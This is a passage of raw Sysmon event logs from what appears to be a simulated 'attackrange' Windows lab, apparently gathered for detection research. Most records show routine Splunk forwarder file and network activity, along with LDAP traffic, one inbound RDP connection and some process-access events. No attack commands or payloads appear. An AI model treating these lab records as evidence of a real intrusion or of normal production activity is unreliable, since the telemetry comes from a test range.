Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57378-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809154Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:08.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A68574E3F48C48EAC5CAC77A8E405D,SHA256=8F37480FFE418B42D616D45240E0C9ECE8F13B2923640AF8E0C5E6AA18A5752D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:59.400{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-58334-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000809156Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:09.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86D0FD87599B13FC2BD00FD7C38D18AF,SHA256=45D30AE58752E4720D8CE95D00C70F2CDFC5D3EBE353871B3518B3949AB40309,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809157Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:10.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D52A8B11F24502B4F1739845DBB6C447,SHA256=B4616F294B6A06F32E35FA98727D4B13C367AEC6501D966FA07505864DE93984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:10.019{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=883A847F2020E9A13920BD697E4E0D7A,SHA256=F82BA3D9EC2FC7DB46832B87CD0821540072C73B6E38A3754E542072428AC5C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:11.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453350F77B79318395FF58315B2AD911,SHA256=76B3212E9AD230C7A6D9AA511BEB872426BE55D440790F35551238F50E3179DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:11.034{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B37A5627FC6DFD846ABD6A006BBB3C53,SHA256=F904694392856B8346A80A1C119BA0133075727BA084BE3D8B77FF32BEDC99CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:02.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51155-false10.0.1.12-8000- 23542300x80000000000000001052369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:12.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC43392F722B02F858856732EE72F173,SHA256=7688B82F4AB8A973B0D07762E772AB1B64F3F8998B84257B5BE1D05F5E6469D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:12.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505B5535B3769FC29BDB6FE5DB9E89B0,SHA256=C8CCB1C28DE642950CE22FB4C2FD7F15FD8CACF0880AEB4F8F7C38CA8183EAA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:13.073{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4107F3013CD5073E68BAEFAB1EB4D53A,SHA256=F5E18E2113EF02F078D851BEC3672564763AFD9E7EE916860444F5AFC9C8E317,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:13.051{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E705B39AE5B51AF30E6CFFEAD0CCE48D,SHA256=D8C3D587FFE33C8C267386410A31EED45B7EB40035D3C12403E9AC62CABAFABB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:12.299{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57379-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:14.104{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007322E4984ADA966DCA54BF5AE653D8,SHA256=FED4DA3D32D8027D28A592DED8C30189D003F8D77C96898DFC528ADDEA4A69E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:14.087{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=419A19EA6FC005AF47047AB0BB68E326,SHA256=4B66E0637BCE336679D734748B37D5BE051AC65A6A35F0C4FDE8EC26FF2B0EFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:15.125{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BCCC1D71A269398816DF9D14583883A,SHA256=5132C5D6B8857B1AE232915A34BDDFC57A87464703ED43EECE06F800D2860C45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:15.503{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F176F4646537EA9567C66FFB4D512A1,SHA256=B9081DA03919A5C86ACE36CFEB6ED79E7FBAD9399A800788910383554A3ED560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:15.503{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E3932029088D60C0F2BCFE4D21E3414,SHA256=95927FF4000A25E695957380721033813649B78F05DF3AEC26CA3430154A96ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:15.088{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6E6219F3F41CFAB480BBEC421645E16,SHA256=AC9D577271B6337948FC2266EE21B0F7277539C473370C277FE77655158ECF2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:16.125{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=019BDF9B05C567A88FA1A0F8E7281EDD,SHA256=A2981EA8E526167887B3F0E1D7B993E1FA822236914FEB7F994B082E8ABB1E2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:08.015{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51157-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:08.015{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51157-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:07.769{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51156-false10.0.1.12-8000- 23542300x80000000000000001052376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:16.088{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E23BE37B52977C14D874443AE5BE486,SHA256=C1B4E8255C257FC3C55287C511CF178224A55C29B7257F8E7DB0CFE1BE9D5AE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:17.089{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B29CFA0D155C286CFAC43E7AFA0C3BB6,SHA256=F95CE3364AB82A078AD5A14F11350998571462574857BF0C34C3955AEEFA9063,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:17.156{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA5E058534E4A3253A3C38C357E3437B,SHA256=83C5FF254A88DCE72E8D11FFD6EB38B97B979B939C4CE51556A4220D8E99BE6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:18.405{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:18.104{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EDE30819564ED221D6FBB77D9D9353B,SHA256=B4EE3F7FDB8C52316525985416A2E42060BCAEC8535A5C8E18017C96D5F6801F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:18.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADC62312910D016098BD85B52F1CC8D,SHA256=CCA1DB841B577F58EE7ACB397DA56818CEFF255091412A0C7F4A2B24FB90E6CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:19.203{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88EC54CE5F92D64AB239AA60F564BF10,SHA256=272CE4CD1496D4B8FC56B75D8004A3F15E0463D3861B101E89F00FD3CEE801FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:19.105{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1160E315D25B0146DC31E78DC51B06CE,SHA256=90BD43636FC85B37376F9BB1D90131A85F75CC51C718EF8B84739069BE0D879D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:20.719{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:20.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFAEC5954E8CA13060C24A26503AB601,SHA256=E33D416B4D4BFFD5CAA83C44673BBED49E66937BAA4A84235E5174B80A48E2AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:20.136{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E570412EC7B41D4DF48CB3151DE2D10,SHA256=EE66D241D768B04F8F28F54577266972150FE38E218B858C535D205445CEE419,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:18.305{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57380-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:13.638{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51158-false10.0.1.12-8000- 23542300x80000000000000001052385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:21.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55CA6DEF8DF644D65AA4F4F1BF0F394E,SHA256=4A8D504EC3BB92B230D5056CA353EE8C6C4E65B0ECE266B6E2F0AE6AD6AD0C7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:21.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D8C7C4CED91DDA67D3A8DC88B5B64A1,SHA256=23C3EDFF1FF9135042459D8EB14709EE1B44CC16526B4807119548A8276E91F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:22.203{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B82845A8ED7CEA7AEDBCF1CF620E9F7B,SHA256=C354931270E32FE225A1FF0C9E5F3A0FCF3F1F219F337BC8B3D0BF220BEE77DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809173Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:22.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C378526C12220E6DF3057A1D237705,SHA256=E22F968F5CAE2D28AFEBC8FA954A4D5484DD1685D9E28E39EA80AA10622981CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:20.852{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57381-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000809174Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:23.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA1023A452E898ACFCE3B19C6A7BA10A,SHA256=CD54962E19B6954C033569B1100CB614D9180F0DAC464D8E0331E22F7AC36DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:23.204{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=797AC98F51B72D08F974D2CD0A5D5F96,SHA256=92FEF20E646C6BA232E41C4A721E303F0CC967EEE36161FB72ED0F0AF98AD5BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.375{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D4-60EB-B279-00000000D001}3064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:24.360{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 